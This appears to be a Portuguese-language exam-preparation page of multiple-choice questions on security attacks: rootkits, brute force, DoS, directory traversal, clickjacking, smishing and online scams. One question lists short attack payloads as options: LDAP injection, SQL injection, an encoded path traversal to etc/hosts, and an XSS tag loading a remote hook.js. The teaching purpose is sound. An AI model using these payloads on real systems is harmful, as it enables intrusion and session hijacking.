Questões sobre Ataques e ameaças

#Questão 1103373 - Segurança da Informação, Ataques e ameaças, IF-ES, 2025, IF-ES, Técnico de Laboratório: Área: Informática

Os sistemas de informação estão constantemente expostos a ameaças provenientes de softwares/códigos projetados para causar danos, roubo de dados, ou comprometer a segurança das máquinas e redes. Sobre essas ameaças, assinale a alternativa INCORRETA:

A)

Um rootkit consiste especificamente em interceptar e analisar pacotes de dados na rede, permitindo que o invasor capture informações confidenciais, como senhas e números de cartão de crédito, sem o conhecimento do usuário.

B)

Um ataque de força bruta, ou brute force, consiste em adivinhar, por tentativa e erro, um nome de usuário e senha e, assim, executar processos e acessar sites, computadores e serviços em nome e com os mesmos privilégios deste usuário.

C)

Desfiguração de página, defacement ou pichação, é uma técnica que consiste em alterar o conteúdo da página Web de um site.

D)

Negação de serviço, ou DoS (Denial of Service), é uma técnica pela qual um atacante utiliza um computador para tirar de operação um serviço, um computador ou uma rede conectada à Internet.

E)

Ransomware é um tipo de código malicioso que torna inacessíveis os dados armazenados em um equipamento, geralmente usando criptografia, e que exige pagamento de resgate (ransom) para restabelecer o acesso ao usuário.

#Questão 1132951 - Segurança da Informação, Ataques e ameaças, FCPC, 2025, UFC, Analista de Tecnologia da Informação / Área: Segurança da Informação

Durante a realização de testes de invasão em uma aplicação Web, um analista encontrou um vetor de ataque para uma travessia de diretórios. Marque a alternativa que possui um payload válido para este ataque.

A)

(&(username=p0wn3d)(password=Pa$$w0rd))

B)

SELECT * FROM tbl_user WHERE username = '' or 1=1--#

C)

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/hosts

D)

blablabla%3Cscript%20src%3D%22https%3A%2F%2Fsites3gur0.foo%2Fhook.js%22%3E%3C% 2Fscript%3E

#Questão 1132952 - Segurança da Informação, Ataques e ameaças, FCPC, 2025, UFC, Analista de Tecnologia da Informação / Área: Segurança da Informação

Uma equipe de tratamento de incidentes está analisando uma campanha de phishing através da qual um atacante utiliza uma página falsa com várias camadas transparentes ou opacas para induzir suas vítimas a interagir com uma página Web diferente daquela que eles acreditam estar interagindo. Marque a alternativa que identifica esse tipo de ataque e uma possível técnica de mitigação para ele.

A)

Clickjacking. X-Frame-Options: SameSite.

B)

Clickjacking. X-Frame-Options: DENY.

C)

XSS. X-Content-Type-Options: nosniff.

D)

Injeção SQL. Validação de entradas.

#Questão 1132955 - Segurança da Informação, Ataques e ameaças, FCPC, 2025, UFC, Analista de Tecnologia da Informação / Área: Segurança da Informação

“Detran alerta para golpes por mensagens SMS: Unidades dos departamentos estaduais de Trânsito (Detrans) em todo o Brasil têm chamado a atenção para tentativas de golpe envolvendo mensagens de texto. Essas mensagens direcionam para sites falsos que solicitam dados pessoais, alegando suspensão ou cassação da Carteira Nacional de Habilitação (CNH).”

(Fonte:https://www.opovo.com.br/noticias/brasil/2024/11/19/detran-alerta-para-golpes-por-mensagens-sms.html).

Ataques de engenharia social utilizando esse vetor de ataque são conhecidos como:

A)

vishing.

B)

whaling.

C)

phishing.

D)

smishing.

#Questão 955378 - Segurança da Informação, Ataques e ameaças, FUNDEP (Gestão de Concursos), 2023, Prefeitura de Urucânia - MG, Auxiliar Administrativo

São tipos de golpes aplicados na internet, conforme o cert.br:

A) Fraude de antecipação de recursos, Phishing e Pharming.

B) Fraude de antecipação de recursos, Phishing e falsificação de e-mail.

C) Falsificação de e-mail, fraude de antecipação de recursos e Pharming.

D) Falsificação de e-mail, Phishing e Pharming.

Questões sobre Ataques e ameaças

Pesquise questões de concurso nos filtros abaixo